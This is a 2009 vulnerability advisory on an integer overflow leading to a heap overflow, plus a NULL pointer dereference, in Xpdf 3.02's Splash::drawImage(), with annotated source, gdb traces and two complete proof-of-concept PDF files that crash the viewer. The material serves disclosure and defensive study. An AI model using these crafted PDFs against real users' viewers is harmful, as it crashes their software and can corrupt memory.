
Xpdf - Integer overflow causing a heap overflow, and a NULL pointer dereference, in Splash::drawImage()



Xpdf - Integer overflow causing a heap overflow, and a NULL pointer dereference, in Splash::drawImage()
Xpdf - Integer overflow causing a heap overflow, and a NULL pointer dereference, in Splash::drawImage()



Name:                      Xpdf - Integer overflow causing a heap overflow, and a NULL pointer dereference, in Splash::drawImage()
Author: Adam Zabrocki / HISPASEC ( or )=0D 
Date:                      July 06, 2009=0D
=0D
=0D
   Issue:=0D
=0D
A crafted PDF lets a local or remote attacker (anyone who can get the victim to open the file) trigger an integer overflow in the image-buffer size computation of Splash::drawImage(), resulting in a heap buffer overflow.
The same code path also contains a NULL pointer dereference (an unchecked gmalloc(0) result), which is a remotely triggerable crash / denial of service.
=0D
=0D
   Description:=0D
=0D
Xpdf is an open-source viewer for Portable Document Format (PDF) files. Xpdf project also includes=0D
a PDF text extractor, PDF-to-PostScript converter, and various other utilities. Xpdf runs under=0D
the X Window System on UNIX, VMS, and OS/2. The non-X components (pdftops, pdftotext, etc.) also=0D
run on Win32 systems and should run on pretty much any system with a decent C++ compiler.=0D
Xpdf is designed to be small and efficient. It can use Type 1, TrueType, or standard X fonts. =0D
=0D
=0D
   Details:=0D
=0D
=0D
Let's look at the code:
=0D
"./goo/gmem.cc"=0D
// gmalloc: wrapper around malloc() that terminates the process on failure.
//
// Security note (review): `size` is a signed int, so any arithmetic overflow
// happens in the CALLER before this function runs. A product that wraps around
// but lands in the positive range (see the (yp + 1) * w * nComps computation in
// Splash::drawImage below) passes the `size < 0` check and yields a buffer far
// smaller than the caller believes it has.
void *gmalloc(int size) GMEM_EXCEP {=0D
#ifdef DEBUG_MEM =0D
   ...=0D
#else =0D
  void *p;=0D
=0D
  // Negative size: fatal (exit(1)) when exceptions are not enabled. This only
  // catches wrapped products that land in the negative half of the int range.
  if (size < 0) {=0D
#if USE_EXCEPTIONS =0D
   ...=0D
#else =0D
    fprintf(stderr, "Invalid memory allocation size\n");=0D
    exit(1);=0D
#endif =0D
  }=0D
  // Zero size: returns NULL silently, NOT an error. Every caller must therefore
  // check for NULL; Splash::drawImage (below) does not, which is the NULL-deref
  // path described in this advisory.
  if (size == 0) {=0D
    return NULL;=0D
  }=0D
  // malloc() failure is likewise fatal (exit(1)) when exceptions are disabled.
  if (!(p = malloc(size))) {=0D
#if USE_EXCEPTIONS =0D
   ...=0D
#else =0D
    fprintf(stderr, "Out of memory\n");=0D
    exit(1);=0D
#endif =0D
  }=0D
  return p;=0D
#endif =0D
}=0D
=0D
So if a negative value is passed to gmalloc(), xpdf prints "Invalid memory allocation size\n" to stderr and terminates via exit(). If 0 (zero) is passed, the function returns NULL - without reporting an error. In every other case it is a plain call to malloc().
Note that the parameter is a signed int: any overflow happens in the caller's arithmetic before gmalloc() is ever entered, so a wrapped product that happens to be positive sails through the `size < 0` check.
=0D
Ok so let's look further.=0D
=0D
"./splash/Splash.cc"=0D
// Splash::drawImage: scale a w x h source image onto the bitmap through
// `mat`, pulling source rows through the `src` callback one row at a time.
//
// Security note (review): w and h come straight from the PDF image
// dictionary (/Width and /Height - see the backtraces and PoC files below)
// and reach the allocation-size arithmetic unchecked:
//   * (yp + 1) * w * nComps is evaluated in 32-bit int and can wrap to a small
//     positive value -> undersized heap buffer that `src` then overflows.
//   * w == 0 makes gmalloc() return NULL; the result is never tested and is
//     dereferenced in the pixel loop -> NULL pointer dereference.
// A fix needs an overflow-checked size computation (not a plain int product),
// a rejection of w <= 0 / h <= 0 before the allocation, and a NULL check on
// the allocation result.
SplashError Splash::drawImage(SplashImageSource src, void *srcData,=0D
                              SplashColorMode srcMode, GBool srcAlpha,=0D
                              int w, int h, SplashCoord *mat) {=0D
...=0D
...=0D
  SplashClipResult clipRes, clipRes2;=0D
  int yp, yq, yt, yStep, lastYStep;=0D
  int xp, xq, xt, xStep, xSrc;=0D
...=0D
  SplashColorPtr colorBuf, p;=0D
...=0D
#if SPLASH_CMYK =0D
  int pixAcc0, pixAcc1, pixAcc2, pixAcc3;=0D
#else =0D
  int pixAcc0, pixAcc1, pixAcc2;=0D
#endif =0D
...=0D
  int nComps, n, m, i, j;=0D
=0D
...=0D
  // check color modes=0D
  ok = gFalse; // make gcc happy=0D
  nComps = 0; // make gcc happy=0D
  // nComps (bytes per pixel of the source row) is a small constant fixed by
  // the bitmap mode: 1, 3 or 4. It is the only non-attacker-controlled factor
  // in the allocation size below.
  switch (bitmap->mode) {=0D
  case splashModeMono1:=0D
  case splashModeMono8:=0D
    ok = srcMode == splashModeMono8;=0D
    nComps = 1;=0D
    break;=0D
  case splashModeRGB8:=0D
    ok = srcMode == splashModeRGB8;=0D
    nComps = 3;=0D
    break;=0D
  case splashModeBGR8:=0D
    ok = srcMode == splashModeBGR8;=0D
    nComps = 3;=0D
    break;=0D
#if SPLASH_CMYK =0D
  case splashModeCMYK8:=0D
    ok = srcMode == splashModeCMYK8;=0D
    nComps = 4;=0D
    break;=0D
#endif =0D
  }=0D
  if (!ok) {=0D
    return splashErrModeMismatch;=0D
  }=0D
...=0D
...=0D
=0D
  // compute Bresenham parameters for x and y scaling=0D
  // scaledHeight / scaledWidth are computed in code elided from this excerpt.
  // yp is the number of source rows consumed per output row; with h taken
  // from the PDF it can be huge (h = 2000000000 -> yp = 15873015 in the PoC).
  yp = h / scaledHeight;=0D
  yq = h % scaledHeight;=0D
  xp = w / scaledWidth;=0D
  xq = w % scaledWidth;=0D
=0D
  // [1] Size computed as a plain int product of attacker-controlled values:
  //  - with large h and w the product wraps (52476190896 -> 936583344 in the
  //    PoC), a POSITIVE value that gmalloc()'s `size < 0` check accepts, so
  //    the buffer is much smaller than the (yp + 1) rows of w * nComps bytes
  //    that the loop at [!!] will write into it;
  //  - with w == 0 the size is 0 and gmalloc() returns NULL.
  // Neither colorBuf nor alphaBuf is checked for NULL.
  colorBuf = (SplashColorPtr)gmalloc((yp + 1) * w * nComps);                <- [1] !!!=0D
  if (srcAlpha) {=0D
    alphaBuf = (Guchar *)gmalloc((yp + 1) * w);=0D
  } else {=0D
    alphaBuf = NULL;=0D
  }=0D
=0D
  pixAcc0 = pixAcc1 = pixAcc2 = 0; // make gcc happy=0D
=0D
...=0D
...=0D
=0D
  if (srcAlpha) {=0D
=0D
...=0D
=0D
...=0D
  } else {=0D
=0D
    // init y scale Bresenham=0D
    yt = 0;=0D
    lastYStep = 1;=0D
=0D
    for (y = 0; y < scaledHeight; ++y) {=0D
=0D
      // y scale Bresenham=0D
      yStep = yp;=0D
      yt += yq;=0D
      if (yt >= scaledHeight) {=0D
        yt -= scaledHeight;=0D
        ++yStep;=0D
      }=0D
      =0D
      // read row(s) from image=0D
      // n is the number of source rows pulled for this output row; it is on
      // the order of yp (15873015 in the PoC trace).
      n = (yp > 0) ? yStep : lastYStep;=0D
      if (n > 0) {=0D
        p = colorBuf;=0D
        for (i = 0; i < n; ++i) {=0D
          // [!!] Indirect call through the `src` function pointer
          // (SplashOutputDev::imageSrc in the trace). The callback fills one
          // full row of imgData->width * nComps bytes at p; it has no idea how
          // big colorBuf is, so once the allocation at [1] has wrapped these
          // writes run off the end of the heap buffer. This is the heap
          // overflow.
          (*src)(srcData, p, NULL);                 <- [!!]  !!!=0D
          p += w * nComps;=0D
        }=0D
      }=0D
=0D
...=0D
=0D
...=0D
=0D
      switch (srcMode) {=0D
=0D
...=0D
...=0D
=0D
      case splashModeRGB8:=0D
      case splashModeBGR8:=0D
        for (x = 0; x < scaledWidth; ++x) {=0D
=0D
          // x scale Bresenham=0D
          xStep = xp;=0D
          xt += xq;=0D
          if (xt >= scaledWidth) {=0D
            xt -= scaledWidth;=0D
            ++xStep;=0D
          }=0D
=0D
...=0D
...=0D
=0D
          // compute the filtered pixel at (x,y) after the x and y scaling=0D
          // operations=0D
          // With w == 0, xp and xq are 0 so xStep is 0 - but m is forced to 1
          // here, so the loop below still reads 3 bytes per row.
          m = xStep > 0 ? xStep : 1;=0D
          // [2] When colorBuf is NULL (w == 0 case) and xSrc is 0, p is NULL.
          p = colorBuf + xSrc * 3;               <-             [2] !!!=0D
          pixAcc0 = pixAcc1 = pixAcc2 = 0;=0D
          for (i = 0; i < n; ++i) {=0D
            for (j = 0; j < m; ++j) {=0D
              // [3] Read through p: NULL pointer dereference in the w == 0
              // case (crash site `movzbl (%ebx),%eax` with ebx == 0 below).
              pixAcc0 += *p++;                   <-             [3] !!!=0D
              pixAcc1 += *p++;=0D
              pixAcc2 += *p++;=0D
            }=0D
            p += 3 * (w - m);=0D
          }=0D
=0D
...=0D
...=0D
=0D
...=0D
...=0D
}=0D
=0D
=0D
We control "w" and "h" directly - they are the image's /Width and /Height from the PDF. If we set "w" to zero (0), the size passed to gmalloc() at [1] is 0, so gmalloc() returns NULL. The return value is never checked.
At [2] we then get p = NULL + xSrc*3, and xSrc can be 0 too, so "p" is NULL. Note that with w == 0 the x-scaling step is 0 as well, yet `m = xStep > 0 ? xStep : 1` still forces one iteration, so the loop at [3] reads through the NULL pointer: a NULL pointer dereference, i.e. a remotely triggerable crash (denial of service).
=0D
Now the other scenario. What happens if "w" has a large value? Let's look:
=0D
(yp + 1) * w * nComps=0D
=0D
"w" we can control immediately, "nComps" have some static value and "yp" we can controle indirectly=0D
because:=0D
=0D
  yp = h / scaledHeight;=0D
=0D
"h" we control once again immediately! So in fact we can do integer overflow and allocate less memory=0D
than it should be. For example:=0D
=0D
h = 2000000000=0D
w = 1102=0D
nComps = 3=0D
yp = h / scaledHeight = 15873015, for the standard scaledHeight = 126
=0D
so the buffer should be (15873015+1)*1102*3 = 15873016*1102*3 = 52476190896 bytes,
but the product is evaluated in 32-bit int, so after wrapping (mod 2^32) it is:
(yp[15873015]+1)*w[1102]*nComps[3] = 936583344

That is far too small - and because the wrapped value is positive, the `size < 0` check in gmalloc() does not catch it. (Signed overflow is undefined behaviour in C++; the wrap-around shown here is what the 32-bit build in the trace below actually produced.)
=0D
In this scenario, after the call to gmalloc() execution reaches the loop at [!!]. `(*src)(srcData, p, NULL)` is an indirect call through the function pointer passed in as `src`, made once per source row;
in the trace below it resolves to SplashOutputDev::imageSrc():
=0D
=0D
"xpdf/SplashOutputDev.cc"=0D
// SplashOutputDev::imageSrc: the `src` callback used by Splash::drawImage.
// Decodes one source row and stores imgData->width pixels into colorLine.
//
// Security note (review): the only loop bound is imgData->width (the PDF's
// /Width); nothing here knows how large colorLine really is. In the RGB8/BGR8
// case every pixel stores 3 bytes, so the caller must guarantee width * 3
// bytes of capacity at colorLine. When drawImage's size computation wraps,
// these stores run past the heap buffer - this is the crash site in the PoC
// trace (SplashOutputDev.cc:1848, `mov %al,0x1(%ebx)`).
GBool SplashOutputDev::imageSrc(void *data, SplashColorPtr colorLine,=0D
                                Guchar *alphaLine) {=0D
  SplashOutImageData *imgData = (SplashOutImageData *)data;=0D
...=0D
  SplashColorPtr q, col;=0D
...=0D
  // nComps is assigned in code elided from this excerpt; `p` and `rgb` are
  // declared there too.
  int nComps, x;=0D
=0D
...=0D
=0D
  if (imgData->lookup) {=0D
    switch (imgData->colorMode) {=0D
...=0D
...=0D
    case splashModeRGB8:=0D
    case splashModeBGR8:=0D
      // p walks the decoded source line; q writes into colorLine. The loop
      // runs imgData->width times regardless of colorLine's actual size.
      for (x = 0, p = imgData->imgStr->getLine(), q = colorLine;=0D
           x < imgData->width;=0D
           ++x, p += nComps) {=0D
        imgData->colorMap->getRGB(p, &rgb);=0D
        // Three unbounded byte stores per pixel - the overflowing writes.
        *q++ = colToByte(rgb.r);=0D
        *q++ = colToByte(rgb.g);=0D
        *q++ = colToByte(rgb.b);=0D
      }=0D
      break;=0D
...=0D
...=0D
}=0D
=0D
And here is the overflow. The allocated buffer is too small, but this function has no way of knowing that:
it converts the colours and writes them into colorLine with:
=0D
        *q++ = colToByte(rgb.r);=0D
        *q++ = colToByte(rgb.g);=0D
        *q++ = colToByte(rgb.b);=0D
=0D
and the loop terminates only on this comparison:
=0D
	 x < imgData->width;=0D
=0D
The bound is the image width taken from the PDF (1102 here), not the size of the buffer, so the writes run off the end of the undersized heap allocation. The caller repeats this call once per source row (n = 15873015 rows in the PoC), so the overrun is not limited to a single row.
=0D
=0D
=0D
=0D
   Proof of concept=0D
=0D
Let's try to do this scenario:=0D
[root@pi3book xpdf-3.02]# xpdf elo.pdf =0D
Error: PDF file is damaged - attempting to reconstruct xref table...=0D
Naruszenie ochrony pamięci        (Polish locale: "Segmentation fault")
[root@pi3book xpdf-3.02]#=0D
=0D
and gdb output:=0D
=0D
(gdb) bt=0D
#0  0x080c222a in SplashOutputDev::imageSrc (data=0xbfffec84, colorLine=0xb7fe46de '�' ..., alphaLine=0x0) at SplashOutputDev.cc:1848=0D
#1  0x080fedc0 in Splash::drawImage (this=0x81e5878, src=0x80c20d0 , srcData=0xbfffec84, =0D
    srcMode=splashModeRGB8, srcAlpha=0, w=1102, h=2000000000, mat=0xbfffec50) at Splash.cc:2532=0D
#2  0x080c1d1f in SplashOutputDev::drawImage (this=0x81bd0f8, state=0x81f0050, ref=0xbfffeebc, str=0x81f0960, width=1102, height=2000000000, =0D
    colorMap=0x81f8ea0, maskColors=0x0, inlineImg=0) at SplashOutputDev.cc:2048=0D
#3  0x080601d9 in Gfx::doImage (this=0x81e5528, ref=0xbfffeebc, str=0x81f0960, inlineImg=0) at Gfx.cc:3657=0D
#4  0x08066799 in Gfx::opXObject (this=0x81e5528, args=0xbfffef34, numArgs=1) at Gfx.cc:3330=0D
#5  0x080612bd in Gfx::go (this=0x81e5528, topLevel=1) at Gfx.cc:581=0D
#6  0x080615ea in Gfx::display (this=0x81e5528, obj=0xbffff1ac, topLevel=1) at Gfx.cc:553=0D
#7  0x080a55cb in Page::displaySlice (this=0x81df9f0, out=0x81bd0f8, hDPI=90, vDPI=90, rotate=0, useMediaBox=0, crop=1, sliceX=0, sliceY=0, sliceW=744, =0D
    sliceH=1052, printing=0, catalog=0x81de638, abortCheckCbk=0, abortCheckCbkData=0x0) at Page.cc:317=0D
#8  0x080aa485 in PDFCore::needTile (this=0x81bcab8, page=0x81e5468, x=0, y=0) at PDFCore.cc:835=0D
#9  0x080abc77 in PDFCore::update (this=0x81bcab8, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at PDFCore.cc:658=0D
#10 0x080de837 in XPDFCore::update (this=0x81bcab8, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at XPDFCore.cc:285=0D
#11 0x080a6861 in PDFCore::displayPage (this=0xbfffe88c, topPageA=1, zoomA=125, rotateA=0, scrollToTop=1, addToHist=1) at PDFCore.cc:292=0D
#12 0x080ea80a in XPDFViewer (this=0x81a35f8, appA=0x8180298, fileName=0x8182b00, pageA=1, destName=0x0, fullScreen=0, ownerPassword=0x0, userPassword=0x0)=0D
    at XPDFViewer.cc:297=0D
#13 0x080dafe0 in XPDFApp::open (this=0x8180298, fileName=0x8182b00, page=1, ownerPassword=0x0, userPassword=0x0) at XPDFApp.cc:228=0D
#14 0x080edcbb in main (argc=Cannot access memory at address 0x0=0D
) at xpdf.cc:311=0D
(gdb) x/i $eip=0D
0x80c222a <_ZN15SplashOutputDev8imageSrcEPvPhS1_+346>:	mov    %al,0x1(%ebx)=0D
(gdb) i r ebx=0D
ebx            0xb7fe4fff	-1208070145=0D
(gdb) x/x $ebx=0D
0xb7fe4fff:	Cannot access memory at address 0xb7fe4fff=0D
(gdb) print q=0D
$1 = (Guchar *) 0xb7fe4fff "�" 
=0D (gdb) print x=0D $2 = 780=0D (gdb) print ((SplashOutImageData *)data)->width=0D $3 = 1102=0D (gdb) up=0D #1 0x080fedc0 in Splash::drawImage (this=0x81e5878, src=0x80c20d0 , srcData=0xbfffec84, =0D srcMode=splashModeRGB8, srcAlpha=0, w=1102, h=2000000000, mat=0xbfffec50) at Splash.cc:2532=0D 2532 (*src)(srcData, p, NULL);=0D (gdb) print colorBuf =0D $4 = (=0D SplashColorPtr) 0x7ffae008 "\204��a\210�a\210�a\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210"...=0D (gdb) print w=0D $5 = 1102=0D (gdb) print h=0D $6 = 2000000000=0D (gdb) print nComps =0D $7 = 3=0D (gdb) list=0D 2527 // read row(s) from image=0D 2528 n = (yp > 0) ? yStep : lastYStep;=0D 2529 if (n > 0) {=0D 2530 p = colorBuf;=0D 2531 for (i = 0; i < n; ++i) {=0D 2532 (*src)(srcData, p, NULL);=0D 2533 p += w * nComps;=0D 2534 }=0D 2535 }=0D 2536 lastYStep = yStep;=0D (gdb) print n=0D $8 = 15873015=0D (gdb) print p=0D $9 = (Guchar *) 0xb7fe46de '�' ...=0D (gdb) =0D =0D So it is exactly what we analyze source :) Look now what will happen when variable "w" have value 0 (zero) - in fact=0D now we will have NULL pointer dereference. 
Let's look:=0D =0D [root@pi3book xpdf-3.02]# xpdf jajo.pdf =0D Error: PDF file is damaged - attempting to reconstruct xref table...=0D Naruszenie ochrony pamięci (core dumped)=0D [root@pi3book xpdf-3.02]# =0D =0D and gdb output:=0D =0D (gdb) bt=0D #0 Splash::drawImage (this=0x81e58e0, src=0x80c20d0 , srcData=0xbfffec84, =0D srcMode=splashModeRGB8, srcAlpha=0, w=0, h=2000000000, mat=0xbfffec50) at Splash.cc:2667=0D #1 0x080c1d1f in SplashOutputDev::drawImage (this=0x81bd100, state=0x81f0090, ref=0xbfffeebc, str=0x81f09c0, width=0, height=2000000000, =0D colorMap=0x81f8f00, maskColors=0x0, inlineImg=0) at SplashOutputDev.cc:2048=0D #2 0x080601d9 in Gfx::doImage (this=0x81e54c8, ref=0xbfffeebc, str=0x81f09c0, inlineImg=0) at Gfx.cc:3657=0D #3 0x08066799 in Gfx::opXObject (this=0x81e54c8, args=0xbfffef34, numArgs=1) at Gfx.cc:3330=0D #4 0x080612bd in Gfx::go (this=0x81e54c8, topLevel=1) at Gfx.cc:581=0D #5 0x080615ea in Gfx::display (this=0x81e54c8, obj=0xbffff1ac, topLevel=1) at Gfx.cc:553=0D #6 0x080a55cb in Page::displaySlice (this=0x81dfa08, out=0x81bd100, hDPI=90, vDPI=90, rotate=0, useMediaBox=0, crop=1, sliceX=0, sliceY=0, sliceW=744, =0D sliceH=1052, printing=0, catalog=0x81de718, abortCheckCbk=0, abortCheckCbkData=0x0) at Page.cc:317=0D #7 0x080aa485 in PDFCore::needTile (this=0x81bcac0, page=0x81e5408, x=0, y=0) at PDFCore.cc:835=0D #8 0x080abc77 in PDFCore::update (this=0x81bcac0, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at PDFCore.cc:658=0D #9 0x080de837 in XPDFCore::update (this=0x81bcac0, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at XPDFCore.cc:285=0D #10 0x080a6861 in PDFCore::displayPage (this=0x0, topPageA=1, zoomA=125, rotateA=0, scrollToTop=1, addToHist=1) at PDFCore.cc:292=0D #11 0x080ea80a in XPDFViewer (this=0x81a35f8, appA=0x8180298, fileName=0x8182b00, pageA=1, destName=0x0, fullScreen=0, ownerPassword=0x0, userPassword=0x0)=0D at XPDFViewer.cc:297=0D #12 0x080dafe0 in 
XPDFApp::open (this=0x8180298, fileName=0x8182b00, page=1, ownerPassword=0x0, userPassword=0x0) at XPDFApp.cc:228=0D #13 0x080edcbb in main (argc=Cannot access memory at address 0x0=0D ) at xpdf.cc:311=0D (gdb) print w=0D $1 = 0=0D (gdb) print i=0D $2 = 0=0D (gdb) print j=0D $3 = 0=0D (gdb) print n=0D $4 = 15873015=0D (gdb) print m=0D $5 = 1=0D (gdb) print p=0D $6 = (Guchar *) 0x0=0D (gdb) print pixAcc0=0D $7 = 0=0D (gdb) x/i $eip=0D 0x80ff720 <_ZN6Splash9drawImageEPFiPvPhS1_ES0_15SplashColorModeiiiPd+9488>: movzbl (%ebx),%eax=0D (gdb) i r ebx=0D ebx 0x0 0=0D (gdb) x/x $ebx=0D 0x0: Cannot access memory at address 0x0=0D (gdb) =0D =0D That's all. Everything is exacly what we analyse.=0D =0D [1] - NULL pointer dereference:=0D =0D -------------- xpdf-poc-null-pointer-dereference.pdf -------------=0D %PDF-1.3=0D % 'BasicFonts': class PDFDictionary =0D 1 0 obj=0D % The standard fonts dictionary=0D << /F1 2 0 R >>=0D endobj=0D % 'F1': class PDFType1Font =0D 2 0 obj=0D % Font Helvetica=0D << /BaseFont /Helvetica=0D /Encoding /WinAnsiEncoding=0D /Name /F1=0D /Subtype /Type1=0D /Type /Font >>=0D endobj=0D % 'FormXob.322a89588a84510d9b1b6ec68c3b4437': class PDFImageXObject =0D 3 0 obj=0D << /BitsPerComponent 8=0D /ColorSpace /DeviceRGB=0D /Filter [ /ASCII85Decode=0D /FlateDecode ]=0D /Height 2000000000=0D /Length 61=0D /Subtype /Image=0D /Type /XObject=0D /Width 0 >>=0D stream=0D GarPPGWE%h$j7l8U/endstream=0D =0D endobj=0D % 'Page1': class PDFPage =0D 4 0 obj=0D % Page dictionary=0D << /Contents 8 0 R=0D /MediaBox [ 0=0D 0=0D 595.2756=0D 841.8898 ]=0D /Parent 7 0 R=0D /Resources << /Font 1 0 R=0D /ProcSet [ /PDF=0D /Text=0D /ImageB=0D /ImageC=0D /ImageI ]=0D /XObject << /FormXob.322a89588a84510d9b1b6ec68c3b4437 3 0 R >> >>=0D /Rotate 0=0D /Trans << >>=0D /Type /Page >>=0D endobj=0D % 'R5': class PDFCatalog =0D 5 0 obj=0D % Document Root=0D << /Outlines 9 0 R=0D /PageMode /UseNone=0D /Pages 7 0 R=0D /Type /Catalog >>=0D endobj=0D % 'R6': class PDFInfo =0D 6 0 obj=0D << 
/Author (anonymous)=0D /CreationDate (20090525000415)=0D /Keywords ()=0D /Producer (ReportLab http://www.reportlab.com)=0D /Subject (unspecified)=0D /Title (untitled) >>=0D endobj=0D % 'R7': class PDFPages =0D 7 0 obj=0D % page tree=0D << /Count 1=0D /Kids [ 4 0 R ]=0D /Type /Pages >>=0D endobj=0D % 'R8': class PDFStream =0D 8 0 obj=0D % page stream=0D << /Filter [ /ASCII85Decode=0D /FlateDecode ]=0D /Length 137 >>=0D stream=0D endstream=0D">Gap(;0b2&S&-VlomLT2HjNbIbQSsFp1e964@g>'endstream=0D =0D endobj=0D % 'R9': class PDFOutlines =0D 9 0 obj=0D << /Count 0=0D /Type /Outlines >>=0D endobj=0D xref=0D 0 10=0D 0000000000 65535 f=0D 0000000113 00000 n=0D 0000000209 00000 n=0D 0000000415 00000 n=0D 0000000710 00000 n=0D 0000001052 00000 n=0D 0000001186 00000 n=0D 0000001397 00000 n=0D 0000001502 00000 n=0D 0000001783 00000 n=0D trailer=0D << /ID =0D % ReportLab generated PDF document -- digest (http://www.reportlab.com) =0D [(xZ\271\226b\372\015\305\017\211\022\241\262?\243\347) (xZ\271\226b\372\015\305\017\211\022\241\262?\243\347)] =0D =0D /Info 6 0 R=0D /Root 5 0 R=0D /Size 10 >>=0D startxref=0D 1834=0D %%EOF=0D -------------- xpdf-poc-null-pointer-dereference.pdf -------------=0D =0D =0D [2] - Integer overflow:=0D =0D -------------- xpdf-poc-integer-overflow.pdf -------------=0D %PDF-1.3=0D % 'BasicFonts': class PDFDictionary =0D 1 0 obj=0D % The standard fonts dictionary=0D << /F1 2 0 R >>=0D endobj=0D % 'F1': class PDFType1Font =0D 2 0 obj=0D % Font Helvetica=0D << /BaseFont /Helvetica=0D /Encoding /WinAnsiEncoding=0D /Name /F1=0D /Subtype /Type1=0D /Type /Font >>=0D endobj=0D % 'FormXob.322a89588a84510d9b1b6ec68c3b4437': class PDFImageXObject =0D 3 0 obj=0D << /BitsPerComponent 8=0D /ColorSpace /DeviceRGB=0D /Filter [ /ASCII85Decode=0D /FlateDecode ]=0D /Height 2000000000=0D /Length 61=0D /Subtype /Image=0D /Type /XObject=0D /Width 1102 >>=0D stream=0D GarPPGWE%h$j7l8U/endstream=0D =0D endobj=0D % 'Page1': class PDFPage =0D 4 0 obj=0D % Page dictionary=0D << 
/Contents 8 0 R=0D /MediaBox [ 0=0D 0=0D 595.2756=0D 841.8898 ]=0D /Parent 7 0 R=0D /Resources << /Font 1 0 R=0D /ProcSet [ /PDF=0D /Text=0D /ImageB=0D /ImageC=0D /ImageI ]=0D /XObject << /FormXob.322a89588a84510d9b1b6ec68c3b4437 3 0 R >> >>=0D /Rotate 0=0D /Trans << >>=0D /Type /Page >>=0D endobj=0D % 'R5': class PDFCatalog =0D 5 0 obj=0D % Document Root=0D << /Outlines 9 0 R=0D /PageMode /UseNone=0D /Pages 7 0 R=0D /Type /Catalog >>=0D endobj=0D % 'R6': class PDFInfo =0D 6 0 obj=0D << /Author (anonymous)=0D /CreationDate (20090525000415)=0D /Keywords ()=0D /Producer (ReportLab http://www.reportlab.com)=0D /Subject (unspecified)=0D /Title (untitled) >>=0D endobj=0D % 'R7': class PDFPages =0D 7 0 obj=0D % page tree=0D << /Count 1=0D /Kids [ 4 0 R ]=0D /Type /Pages >>=0D endobj=0D % 'R8': class PDFStream =0D 8 0 obj=0D % page stream=0D << /Filter [ /ASCII85Decode=0D /FlateDecode ]=0D /Length 137 >>=0D stream=0D endstream=0D">Gap(;0b2&S&-VlomLT2HjNbIbQSsFp1e964@g>'endstream=0D =0D endobj=0D % 'R9': class PDFOutlines =0D 9 0 obj=0D << /Count 0=0D /Type /Outlines >>=0D endobj=0D xref=0D 0 10=0D 0000000000 65535 f=0D 0000000113 00000 n=0D 0000000209 00000 n=0D 0000000415 00000 n=0D 0000000710 00000 n=0D 0000001052 00000 n=0D 0000001186 00000 n=0D 0000001397 00000 n=0D 0000001502 00000 n=0D 0000001783 00000 n=0D trailer=0D << /ID =0D % ReportLab generated PDF document -- digest (http://www.reportlab.com) =0D [(xZ\271\226b\372\015\305\017\211\022\241\262?\243\347) (xZ\271\226b\372\015\305\017\211\022\241\262?\243\347)] =0D =0D /Info 6 0 R=0D /Root 5 0 R=0D /Size 10 >>=0D startxref=0D 1834=0D %%EOF=0D =0D -------------- xpdf-poc-integer-overflow.pdf -------------=0D =0D =0D Greets=0D =0D Guys from HISPASEC, snoop, thorkill, Piotr Bania, guys from SecurityReason,=0D #lam3rz@IRCNET and #plhack@IRCNET=0D =0D =0D Disclaimer=0D =0D This document and all the information it contains is provided "as is",=0D without any warranty. 
The author is not responsible for the misuse of the information provided in this advisory. The advisory is provided for educational purposes only.

Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.


Ending words...

That's all. I tested it on version 3.02 with all security patches applied. Probably all versions are vulnerable. Thanks and best regards, Adam Zabrocki (pi3 / pi3ki31ny).



Disclosure Timeline

*) 14 October, 2009 - vendor released a patch
...
...
*) 27 July, 2009 - further exchange with vendor
*) 23 July, 2009 - contacted vendor
*) 06 July, 2009 - exploited bug and wrote advisory
*) 04 July, 2009 - found bug



--
http://hispasec.com
http://pi3.com.pl
